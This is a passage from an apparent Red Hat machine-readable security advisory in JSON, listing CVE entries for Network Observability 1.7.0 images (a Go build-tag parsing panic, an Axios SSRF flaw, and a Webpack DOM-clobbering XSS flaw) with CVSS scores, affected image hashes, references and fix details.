"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-39338",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2024-08-13T17:21:32.774718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2304369"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: axios: Server-Side Request Forgery",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-39338"
},
{
"category": "external",
"summary": "RHBZ#2304369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304369"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases",
"url": "https://github.com/axios/axios/releases"
},
{
"category": "external",
"summary": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html",
"url": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html"
}
],
"release_date": "2024-08-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: axios: Server-Side Request Forgery"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
